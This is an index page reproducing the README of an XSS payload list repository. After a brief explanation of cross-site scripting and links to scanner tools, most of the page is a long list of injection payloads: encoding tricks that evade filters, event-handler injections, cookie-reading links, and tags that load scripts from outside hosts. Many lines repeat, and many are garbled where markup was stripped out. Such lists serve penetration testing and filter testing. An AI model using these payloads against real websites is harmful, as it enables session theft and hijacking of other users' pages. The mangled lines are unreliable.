Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/payloadbox/xss-payload-list

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
https://github.com/payloadbox/xss-payload-list

bugbounty cross-site-scripting dom-based payload payloads reflected-xss-vulnerabilities self-xss websecurity website-vulnerability xss xss-attacks xss-detection xss-exploitation xss-injection xss-payload xss-payloads xss-poc xss-scanner xss-scanners xss-vulnerability

Last synced: about 1 month ago
JSON representation

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

Awesome Lists containing this project

README

        

### 🚀 Cross Site Scripting ( XSS ) Vulnerability Payload List 🚀

##### Overview :

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws, see: [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).

#### XSS Vulnerability Scanner Tool's :

* [XSStrike](https://github.com/UltimateHackers/XSStrike)

* [BruteXSS Terminal](https://github.com/shawarkhanethicalhacker/BruteXSS)

* [BruteXSS GUI](https://github.com/rajeshmajumdar/BruteXSS)

* [XSS Scanner Online](http://xss-scanner.com/)

* [XSSer](https://tools.kali.org/web-applications/xsser)

* [xsscrapy](https://github.com/DanMcInerney/xsscrapy)
* [Cyclops](https://github.com/v8blink/Chromium-based-XSS-Taint-Tracking)

#### XSS Payload List :

```

"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)>"@x.y


t>
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)

\x3Cscript>javascript:alert(1)
'"`>/* *\x2Fjavascript:alert(1)// */
javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)

--> -->
-->
-->
-->
`"'>

a='hello\x27;javascript:alert(1)//';


test
test
test
test
test
test
test
test
test
test
test
test
test
test
/* *\x2A/javascript:alert(1)// */
/* *\x00/javascript:alert(1)// */

"'`>ABC

DEF
"'`>ABC
DEF
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}
if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}
if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>

javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
ABC

DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
"`'>\x3Bjavascript:alert(1)
"`'>\x0Djavascript:alert(1)
"`'>\xEF\xBB\xBFjavascript:alert(1)
"`'>\xE2\x80\x81javascript:alert(1)
"`'>\xE2\x80\x84javascript:alert(1)
"`'>\xE3\x80\x80javascript:alert(1)
"`'>\x09javascript:alert(1)
"`'>\xE2\x80\x89javascript:alert(1)
"`'>\xE2\x80\x85javascript:alert(1)
"`'>\xE2\x80\x88javascript:alert(1)
"`'>\x00javascript:alert(1)
"`'>\xE2\x80\xA8javascript:alert(1)
"`'>\xE2\x80\x8Ajavascript:alert(1)
"`'>\xE1\x9A\x80javascript:alert(1)
"`'>\x0Cjavascript:alert(1)
"`'>\x2Bjavascript:alert(1)
"`'>\xF0\x90\x96\x9Ajavascript:alert(1)
"`'>-javascript:alert(1)
"`'>\x0Ajavascript:alert(1)
"`'>\xE2\x80\xAFjavascript:alert(1)
"`'>\x7Ejavascript:alert(1)
"`'>\xE2\x80\x87javascript:alert(1)
"`'>\xE2\x81\x9Fjavascript:alert(1)
"`'>\xE2\x80\xA9javascript:alert(1)
"`'>\xC2\x85javascript:alert(1)
"`'>\xEF\xBF\xAEjavascript:alert(1)
"`'>\xE2\x80\x83javascript:alert(1)
"`'>\xE2\x80\x8Bjavascript:alert(1)
"`'>\xEF\xBF\xBEjavascript:alert(1)
"`'>\xE2\x80\x80javascript:alert(1)
"`'>\x21javascript:alert(1)
"`'>\xE2\x80\x82javascript:alert(1)
"`'>\xE2\x80\x86javascript:alert(1)
"`'>\xE1\xA0\x8Ejavascript:alert(1)
"`'>\x0Bjavascript:alert(1)
"`'>\x20javascript:alert(1)
"`'>\xC2\xA0javascript:alert(1)
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)

alert(1)0


document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;

<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)">
javascript:alert(1)">
foo=">javascript:alert(1)">
foo=">">

<% foo>

d.innerHTML=d.innerHTML


































XXX

javascript:alert(1)//"

`><img src=x:x onerror=javascript:alert(1)></a>


X
p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
@import "data:,*%7bx:expression(javascript:alert(1))%7D";
XXXXXX
*[{}@import'%(css)s?]X

XXX
XXX
/ style=x:expression\28javascript:alert(1)\29>
*{x:expression(javascript:alert(1))}

X
X
with(document.getElementById("d"))innerHTML=innerHTML
X
X
XXX
#x{font-family:foo[bar;color:green;} #y];color:red;{}
XXX
({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval
({0:#0=eval/#0#/#0#(javascript:alert(1))})
ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
<script>%(payload)s

javascript:alert(1)


<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s">
<%(payload)s//<



@import'%(css)s';

li {list-style-image: url("javascript:javascript:alert(1)");}

  • XSS



    javascript:alert(1);
    .XSS{background-image:url("javascript:javascript:alert(1)");}
    BODY{background:url("javascript:javascript:alert(1)")}

    XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">

    +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
    X










































    @import'%(css)s';
    a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}
    &&javascript:alert(1)&&;&&<&&/script&&>
    <SCRIPT onreadystatechange=javascript:javascript:alert(1);>

    javascript:alert(1);

    ]]

    test1
    test1

    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
    alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
    >">'>alert(String.fromCharCode(88,83,83))
    '';!--"=&{()}






    xxs link
    xxs link
    alert("XSS")">











    perl -e 'print "";' > out

    <alert("XSS");//<

    <SCRIPT SRC=//ha.ckers.org/.j>
    <IMG SRC="javascript:alert('XSS')"
    <iframe src=http://ha.ckers.org/scriptlet.html <
    \";alert('XSS');//
    </TITLE><SCRIPT>alert("XSS");



    li {list-style-image: url("javascript:alert('XSS')");}

    • XSS


      @import'http://ha.ckers.org/xss.css';

      BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
      @im\port'\ja\vasc\ript:alert("XSS")';

      exp/*
      alert('XSS');
      .XSS{background-image:url("javascript:alert('XSS')");}

      BODY{background:url("javascript:alert('XSS')")}
      BODY{background:url("javascript:alert('XSS')")}

      ¼script¾alert(¢XSS¢)¼/script¾




      echo('alert("XSS")'); ?>
      Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

      +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

      " SRC="http://ha.ckers.org/xss.js">

      '" SRC="http://ha.ckers.org/xss.js">
      ` SRC="http://ha.ckers.org/xss.js">

      document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
      XSS
      XSS
      XSS
      XSS
      XSS
      XSS

      {font-family&colon;'<iframe/onload=confirm(1)>'
      <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
      <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
      <img/src=`%00` onerror=this.onerror=confirm(1)
      <form><isindex formaction="javascript&colon;confirm(1)"
      <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
      <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
      <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
      <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
      <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
      &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
      <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
      <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
      <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
      <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
      <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
      <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
      <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
      </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
      <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
      <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
      <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
      http://www.google<script .com>alert(document.location)</script
      <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
      <img/src=@&#32;&#13; onerror = prompt('&#49;')
      <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
      <script ^__^>alert(String.fromCharCode(49))</script ^__^
      /**/alert(document.location)/**/

      /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
      X
      alert(0%0)

      <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
      <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
      &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
      &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
      <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
      <div/style="width:expression(confirm(1))">X</div> {IE7}
      <iframe/%00/ src=javaSCRIPT&colon;alert(1)
      //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
      /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
      //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
      </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/

      |\>''alert&#x28;1&#x29; {Opera}
      <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
      <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
      <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
      <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
      <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
      <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
      <var onmouseover="prompt(1)">On Mouse Over</var>
      <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
      <img src="/" =_=" title="onerror='prompt(1)'">
      <%<!--'%><script>alert(1);

      X


      http://www.alert(1)
      alert(1)
      <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
      <img src=`xx:xx`onerror=alert(1)>
      <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
      <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
      <math><a xlink:href="//jsfiddle.net/t846h/">click
      <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
      <svg contentScriptType=text/vbs><script>MsgBox+1
      <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
      <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
      <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
      +-+-1-+-+alert(1)

      /*<script* */alert(1)//&NewLine;confirm(1);
      alert(1)
      <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
      <script x> alert(1) style="x:">
      <--` --!>

      x
      ">
      CLICKME
      click

      Click Me
      ‘; alert(1);
      ‘)alert(1);//
      alert(1)




      {font-family&colon;'<iframe/onload=confirm(1)>'
      <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
      <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
      <img/src=`%00` onerror=this.onerror=confirm(1)
      <form><isindex formaction="javascript&colon;confirm(1)"
      <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
      <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
      <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
      <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
      <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
      &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
      <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
      <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
      <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
      <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
      <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
      <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
      <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
      </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
      <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
      <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
      <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
      http://www.google<script .com>alert(document.location)</script
      <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
      <img/src=@&#32;&#13; onerror = prompt('&#49;')
      <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
      <script ^__^>alert(String.fromCharCode(49))</script ^__^
      /**/alert(document.location)/**/

      /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
      X
      alert(0%0)

      <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
      <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
      &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
      &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
      <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
      <div/style="width:expression(confirm(1))">X</div> {IE7}
      <iframe/%00/ src=javaSCRIPT&colon;alert(1)
      //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
      /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
      //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
      </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/

      |\>''alert&#x28;1&#x29; {Opera}
      <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
      <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
      <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
      <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
      <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
      <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
      <var onmouseover="prompt(1)">On Mouse Over</var>
      <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
      <img src="/" =_=" title="onerror='prompt(1)'">
      <%<!--'%><script>alert(1);

      X


      http://www.alert(1)
      alert(1)
      <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
      <img src=`xx:xx`onerror=alert(1)>
      <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
      <math><a xlink:href="//jsfiddle.net/t846h/">click
      <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
      <svg contentScriptType=text/vbs><script>MsgBox+1
      <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
      <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
      <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
      +-+-1-+-+alert(1)

      /*<script* */alert(1)//&NewLine;confirm(1);
      alert(1)
      <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
      <script x> alert(1) style="x:">
      <--` --!>

      x
      ">
      CLICKME
      click

      Click Me
      String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
      ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))
      alert(“XSS”)”>



      <alert(“XSS”);//<
      %253cscript%253ealert(1)%253c/script%253e
      “>alert(document.cookie)
      fooalert(1)
      ipt>alert(1)ipt>




      <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))

      '" SRC="http://ha.ckers.org/xss.js">

      document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
      <alert("XSS");//<
      <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
      ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
      <script>alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
      alert("XSS");&search=1
      0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search

      hellox worldss







      ...




      lol


      <img src="
      foo=">alert(1)">
      alert(1)">
      foo=">alert(1)">
      foo=">">

      <% foo>

      LOL
      LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
      ({0:#0=alert/#0#/#0#(0)})
      LOLalert(123)
      <SCRIPT>alert(/XSS/.source)</SCRIPT>
      \\";alert('XSS');//
      </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
      <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
      <BODY BACKGROUND=\"javascript:alert('XSS')\">
      <BODY ONLOAD=alert('XSS')>
      <IMG DYNSRC=\"javascript:alert('XSS')\">
      <IMG LOWSRC=\"javascript:alert('XSS')\">
      <BGSOUND SRC=\"javascript:alert('XSS');\">
      <BR SIZE=\"&{alert('XSS')}\">
      <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
      <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
      <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
      <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
      <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
      <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
      <XSS STYLE=\"behavior: url(xss.htc);\">
      <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
      <IMG SRC='vbscript:msgbox(\"XSS\")'>
      <IMG SRC=\"mocha:[code]\">
      <IMG SRC=\"livescript:[code]\">
      žscriptualert(EXSSE)ž/scriptu
      <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
      <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
      <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
      <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
      <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
      <TABLE BACKGROUND=\"javascript:alert('XSS')\">
      <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
      <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
      <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
      <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
      <DIV STYLE=\"width: expression(alert('XSS'));\">
      <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
      <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
      <XSS STYLE=\"xss:expression(alert('XSS'))\">
      exp/*<A STYLE='no\xss:noxss(\"*//*\");
      xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
      <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
      <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
      <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
      <!--[if gte IE 4]>
      <SCRIPT>alert('XSS');</SCRIPT>
      <![endif]-->
      <BASE HREF=\"javascript:alert('XSS');//\">
      <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
      <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
      <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
